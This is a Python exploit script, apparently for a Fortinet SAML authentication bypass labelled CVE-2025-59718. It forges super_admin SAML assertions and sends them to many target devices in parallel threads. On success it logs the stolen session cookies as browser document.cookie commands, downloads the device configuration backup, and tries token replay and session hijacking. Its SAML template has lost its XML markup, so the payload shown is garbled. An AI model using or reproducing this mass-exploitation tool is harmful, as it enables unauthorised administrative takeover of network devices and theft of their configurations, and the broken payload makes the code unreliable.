import requests import urllib3 import base64 from datetime import datetime, timedelta import concurrent.futures import threading import logging from typing import List, Optional import os import csv from time import sleep import argparse # Disable SSL warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Setup logging logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s') logger = logging.getLogger(__name__) def generate_saml_bypass(target_url: str, username: str = "admin") -> str: """ Generate a SAML bypass payload to exploit the vulnerability. """ now = datetime.utcnow() not_before = (now - timedelta(minutes=5)).strftime('%Y-%m-%dT%H:%M:%SZ') not_after = (now + timedelta(hours=1)).strftime('%Y-%m-%dT%H:%M:%SZ') saml = f""" https://sso.forticloud.com https://sso.forticloud.com {username}@forticloud.com https://forticloud.com urn:oasis:names:tc:SAML:2.0:ac:classes:unspecified super_admin """ return base64.b64encode(saml.encode('utf-8')).decode('utf-8') def exploit_target(target: str, username: str, endpoint: str, proxy: Optional[str] = None, results_lock: threading.Lock = None, vulnerable_file: str = "vulnerable_targets.txt", saml_token: Optional[str] = None, output_file: str = "attack_report.csv", post_auth_config: bool = False) -> bool: """ Attempt to exploit a single target. """ if not target.startswith("http"): target = "https://" + target target = target.rstrip("/") url = f"{target}{endpoint}" try: saml_b64 = generate_saml_bypass(url, username) except Exception as e: logger.error(f"SAML generation failed for {target}: {str(e)}") return False data = { "SAMLResponse": saml_b64, "RelayState": "" } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded" } if proxy: proxies = {"http": proxy, "https": proxy} else: proxies = None logger.info(f"[+] Targeting: {url} (Thread: {threading.current_thread().name})") try: session = requests.Session() r = session.post(url, data=data, headers=headers, verify=False, allow_redirects=True, timeout=15, proxies=proxies) if r.status_code in [200, 302]: if any(keyword in r.text.lower() for keyword in ["logout", "dashboard", "fortios", "fortiproxy"]): logger.info(f"[+++] SUCCESS - Vulnerable: {target} (Authenticated as {username})") logger.info(f"[+] Cookies: {session.cookies.get_dict()}") logger.info(f"[+] URL: {r.url}") # Print browser cookie instructions logger.info("\n[+] Browser cookie instructions:") for k, v in session.cookies.items(): logger.info(f" document.cookie = '{k}={v}';") # Save to vulnerable file try: if results_lock: with results_lock: with open(vulnerable_file, 'a') as f: f.write(f"{target} - Vulnerable\nCookies: {session.cookies.get_dict()}\nURL: {r.url}\n\n") else: with open(vulnerable_file, 'a') as f: f.write(f"{target} - Vulnerable\nCookies: {session.cookies.get_dict()}\nURL: {r.url}\n\n") except Exception as e: logger.error(f"Vulnerable file write failed for {target}: {str(e)}") # Initialize CSV if not exists try: if results_lock: with results_lock: if not os.path.exists(output_file): with open(output_file, 'w', newline='') as f: writer = csv.writer(f) writer.writerow(["Target", "Username", "Attack Type", "Result", "Status Code"]) else: if not os.path.exists(output_file): with open(output_file, 'w', newline='') as f: writer = csv.writer(f) writer.writerow(["Target", "Username", "Attack Type", "Result", "Status Code"]) except Exception as e: logger.error(f"CSV init failed: {str(e)}") # Post-auth config download if post_auth_config: logger.info(f"[+] Attempting to download system configuration from {target}...") try: config_url = f"{target}/api/v2/monitor/system/config/backup" params = {"scope": "global"} r_config = session.get(config_url, params=params, verify=False, timeout=15, proxies=proxies) if r_config.status_code == 200: config_filename = f"{target.replace('https://', '').replace('/', '_')}_config.conf" try: with open(config_filename, 'w') as f: f.write(r_config.text) logger.info(f"[++] System configuration downloaded successfully to {config_filename}") except Exception as write_e: logger.error(f"Config file write failed for {target}: {str(write_e)}") raise # Re-raise to log in CSV as failed try: if results_lock: with results_lock: with open(output_file, 'a', newline='') as f: writer = csv.writer(f) writer.writerow([target, username, "Config Download", "Success", r_config.status_code]) else: with open(output_file, 'a', newline='') as f: writer = csv.writer(f) writer.writerow([target, username, "Config Download", "Success", r_config.status_code]) except Exception as csv_e: logger.error(f"CSV write failed for config success on {target}: {str(csv_e)}") else: logger.warning(f"[-] Config download failed on {target} (Status: {r_config.status_code})") try: if results_lock: with results_lock: with open(output_file, 'a', newline='') as f: writer = csv.writer(f) writer.writerow([target, username, "Config Download", "Failed", r_config.status_code]) else: with open(output_file, 'a', newline='') as f: writer = csv.writer(f) writer.writerow([target, username, "Config Download", "Failed", r_config.status_code]) except Exception as csv_e: logger.error(f"CSV write failed for config failure on {target}: {str(csv_e)}") except requests.exceptions.RequestException as config_e: logger.error(f"Network error in config download on {target}: {str(config_e)}") try: if results_lock: with results_lock: with open(output_file, 'a', newline='') as f: writer = csv.writer(f) writer.writerow([target, username, "Config Download", "Failed (Network Error)", "N/A"]) else: with open(output_file, 'a', newline='') as f: writer = csv.writer(f) writer.writerow([target, username, "Config Download", "Failed (Network Error)", "N/A"]) except Exception as csv_e: logger.error(f"CSV write failed for config network error on {target}: {str(csv_e)}") except Exception as config_e: logger.error(f"Unexpected error in config download on {target}: {str(config_e)}") try: if results_lock: with results_lock: with open(output_file, 'a', newline='') as f: writer = csv.writer(f) writer.writerow([target, username, "Config Download", "Failed (Unexpected Error)", "N/A"]) else: with open(output_file, 'a', newline='') as f: writer = csv.writer(f) writer.writerow([target, username, "Config Download", "Failed (Unexpected Error)", "N/A"]) except Exception as csv_e: logger.error(f"CSV write failed for config unexpected error on {target}: {str(csv_e)}") # SAML token replay attack with new session if saml_token: logger.info(f"[+] Attempting SAML token replay attack on {target}...") try: replay_session = requests.Session() try: # Assume saml_token is base64-encoded; if not, encode it base64.b64decode(saml_token) # Validate except: logger.warning("[!] Provided SAML token is not base64-encoded. Encoding it now.") saml_token = base64.b64encode(saml_token.encode('utf-8')).decode('utf-8') data["SAMLResponse"] = saml_token r2 = replay_session.post(url, data=data, headers=headers, verify=False, allow_redirects=True, timeout=15, proxies=proxies) if r2.status_code in [200, 302]: if any(keyword in r2.text.lower() for keyword in ["logout", "dashboard", "fortios", "fortiproxy"]): logger.info(f"[++] SAML token replay successful on {target}") try: if results_lock: with results_lock: with open(output_file, 'a', newline='') as f: writer = csv.writer(f) writer.writerow([target, username, "SAML Token Replay", "Success", r2.status_code]) else: with open(output_file, 'a', newline='') as f: writer = csv.writer(f) writer.writerow([target, username, "SAML Token Replay", "Success", r2.status_code]) except Exception as csv_e: logger.error(f"CSV write failed for replay success on {target}: {str(csv_e)}") else: logger.warning(f"[-] SAML token replay failed on {target}") try: if results_lock: with results_lock: with open(output_file, 'a', newline='') as f: writer = csv.writer(f) writer.writerow([target, username, "SAML Token Replay", "Failed", r2.status_code]) else: with open(output_file, 'a', newline='') as f: writer = csv.writer(f) writer.writerow([target, username, "SAML Token Replay", "Failed", r2.status_code]) except Exception as csv_e: logger.error(f"CSV write failed for replay failure on {target}: {str(csv_e)}") sleep(1) # Rate limit between attacks except requests.exceptions.RequestException as replay_e: logger.error(f"Network error in replay on {target}: {str(replay_e)}") except Exception as replay_e: logger.error(f"Unexpected error in replay on {target}: {str(replay_e)}") else: logger.info("[+] SAML token replay not enabled.") # SSO session hijacking with new session (using same logic as replay but noted as separate for clarity; could be customized) if saml_token: logger.info(f"[+] Attempting SSO session hijacking on {target}...") try: hijack_session = requests.Session() data["SAMLResponse"] = saml_token # Reuse token r3 = hijack_session.post(url, data=data, headers=headers, verify=False, allow_redirects=True, timeout=15, proxies=proxies) if r3.status_code in [200, 302]: if any(keyword in r3.text.lower() for keyword in ["logout", "dashboard", "fortios", "fortiproxy"]): logger.info(f"[++] SSO session hijacking successful on {target}") try: if results_lock: with results_lock: with open(output_file, 'a', newline='') as f: writer = csv.writer(f) writer.writerow([target, username, "SSO Session Hijacking", "Success", r3.status_code]) else: with open(output_file, 'a', newline='') as f: writer = csv.writer(f) writer.writerow([target, username, "SSO Session Hijacking", "Success", r3.status_code]) except Exception as csv_e: logger.error(f"CSV write failed for hijacking success on {target}: {str(csv_e)}") else: logger.warning(f"[-] SSO session hijacking failed on {target}") try: if results_lock: with results_lock: with open(output_file, 'a', newline='') as f: writer = csv.writer(f) writer.writerow([target, username, "SSO Session Hijacking", "Failed", r3.status_code]) else: with open(output_file, 'a', newline='') as f: writer = csv.writer(f) writer.writerow([target, username, "SSO Session Hijacking", "Failed", r3.status_code]) except Exception as csv_e: logger.error(f"CSV write failed for hijacking failure on {target}: {str(csv_e)}") sleep(1) # Rate limit between attacks except requests.exceptions.RequestException as hijack_e: logger.error(f"Network error in hijacking on {target}: {str(hijack_e)}") except Exception as hijack_e: logger.error(f"Unexpected error in hijacking on {target}: {str(hijack_e)}") else: logger.info("[+] SSO session hijacking not enabled.") return True else: logger.warning(f"[-] Not vulnerable: {target} (Status: {r.status_code}, no success keywords)") return False else: logger.warning(f"[-] Not vulnerable: {target} (Status: {r.status_code})") return False except requests.exceptions.RequestException as e: logger.error(f"Network error on {target}: {str(e)}") return False except Exception as e: logger.error(f"Unexpected error on {target}: {str(e)}") return False def main(): """ Main function to run the exploit. """ parser = argparse.ArgumentParser(description="CVE-2025-59718 Exploit Wizard") parser.add_argument('--target', type=str, help="Single target IP/hostname") parser.add_argument('--targets', type=str, help="Comma-separated list of targets") parser.add_argument('--file', type=str, help="File path with one target per line") parser.add_argument('--username', type=str, default="admin", help="Username to impersonate (default: admin)") parser.add_argument('--endpoint', type=str, default="/remote/saml/login", help="SAML endpoint (default: /remote/saml/login)") parser.add_argument('--max-threads', type=int, default=10, help="Max parallel threads (default: 10)") parser.add_argument('--saml-token', type=str, help="SAML token for replay attack (optional, base64-encoded preferred)") parser.add_argument('--proxy', type=str, help="Proxy (optional, e.g., http://127.0.0.1:8080)") parser.add_argument('--post-auth-config', action='store_true', help="Perform post-auth config download") parser.add_argument('--vulnerable-file', type=str, default="vulnerable_targets.txt", help="File to save vulnerable targets (default: vulnerable_targets.txt)") parser.add_argument('--output-file', type=str, default="attack_report.csv", help="CSV file for attack reports (default: attack_report.csv)") args = parser.parse_args() logger.info("*** CVE-2025-59718 Exploit Wizard ***") logger.info("WARNING: Use ONLY on authorized systems. This demonstrates attack scale for awareness.") logger.info("Patch your Fortinet devices immediately! See Fortinet advisory for details.") targets: List[str] = [] if args.target: targets = [args.target] elif args.targets: targets = [t.strip() for t in args.targets.split(',') if t.strip()] elif args.file: try: with open(args.file, 'r') as f: targets = [line.strip() for line in f if line.strip()] except Exception as e: logger.error(f"Error reading file {args.file}: {str(e)}") return else: logger.error("No targets provided. Use --target, --targets, or --file.") return if not targets: logger.info("No valid targets to process.") return username = args.username endpoint = args.endpoint max_threads = args.max_threads saml_token = args.saml_token proxy = args.proxy post_auth_config = args.post_auth_config vulnerable_file = args.vulnerable_file output_file = args.output_file results_lock = threading.Lock() logger.info(f"\nTargeting {len(targets)} devices with {max_threads} threads...") try: with concurrent.futures.ThreadPoolExecutor(max_workers=max_threads) as executor: futures = [executor.submit(exploit_target, t, username, endpoint, proxy, results_lock, vulnerable_file, saml_token, output_file, post_auth_config) for t in targets] vulnerable_count = sum(future.result() for future in concurrent.futures.as_completed(futures)) except Exception as e: logger.error(f"Execution error: {str(e)}") return logger.info(f"\nScan complete. {vulnerable_count} vulnerable devices found.") if vulnerable_count > 0: logger.info(f"Details saved to {vulnerable_file}") logger.info(f"Attack reports saved to {output_file}") logger.info("Urgent: Patch to fixed versions and disable FortiCloud SAML if needed.") if __name__ == "__main__": main()